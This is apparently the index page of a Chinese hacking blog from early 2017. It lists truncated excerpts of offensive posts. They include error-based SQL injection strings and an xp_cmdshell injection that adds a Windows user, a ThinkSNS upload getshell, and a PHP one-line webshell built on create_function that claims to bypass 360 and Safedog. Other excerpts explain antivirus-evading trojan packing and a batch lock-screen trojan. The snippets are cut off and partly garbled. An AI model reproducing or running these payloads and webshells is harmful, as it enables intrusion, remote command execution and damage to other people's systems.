使用微语记录您身边的新鲜事

feed订阅 腾讯微博 新浪微博 twitter 你好,欢迎光临!

很多人喜欢去网吧玩黑,每个人都有不同的理由和目的。有的是实践所学,有的是为了争取自由,也有人是为了占小便宜。不管何种理由,都伴随着风险。不管是网管的监督还是旁人的...
传统的autorun.inf都是直接open=木马.exe,但这样有一个缺点就是直接双击打不开,确实也是一个很头疼的问题。毕竟现在的用户都学聪明了,一旦有文件双击打不开就会意识到出现了问题...
1、通过floor报错,注入语句如下: and select 1 from ( select count (*), concat ( version (), floor ( rand ( 0 )* 2 ))x from information_schema. tables group by x)a); 2、通过ExtractValue报错,注入语句如下: andextractvalue(1...

Thinksns前台Getshell

2017-01-03, 技术文章 ,抢沙发,296人打酱油
这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。 先构造一个上传表单: htmlbody form action=http://localhost/thinksns434/index.php?app=publicmod=attachac...
0x01 代码审计 lib/default/tool_act.php 392行 ? php function cut_image_action () { $len = 1 ; if ( config :: get ( base_url ) != / ){ $len = strlen ( config :: get ( base_url ))+ 1 ; } if ( substr ( $_POST [ pic ], 0 , 4 ) == http ){ fr...

最新过狗一句话木马

2017-01-02, 技术文章 ,抢沙发,196人打酱油
用的命令执行的方法 基本360 安全狗 云锁 之类的都可以过。 lt ;? php $args = tony ; $code = n;}$_POST[123];/* ; echo create_function ( $args , $code ); ? gt ;...
首先正常生成一个远程木马 肯定会爆毒 我们打开易语言 新建窗口进行封装 然后导入图片组 双击标题进入 程序代码编辑 写到文件 ( c : \windows\system32\ceshi . exe , #图片1) 运行 ( c : \windo...
目前貌似是个刷钻的都会用批处理做锁机木马了,这里发个教程 以前从吐死看见的。 开机时按F8让启动界面进入到这里 然后选择 正常启动Windows选项时强制关机或者把电源关了 再开机...
有一次我的朋友将U盘插入我的电脑,然后双击打开了盘符,莫名其妙的窗口以最大化的形式打开了,一个可怕的念头闪入我的脑海中:电脑中毒了,没办法,只好暂停下载歌曲,先着手...

SQL注入语句大全

2017-01-01, 技术文章 ,抢沙发,306人打酱油
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = x and name = xp_cmdshell) --用xp_cmdshell执行命令 ;exec master..xp_cmdshell net user name password /add-- ;exec master..xp_...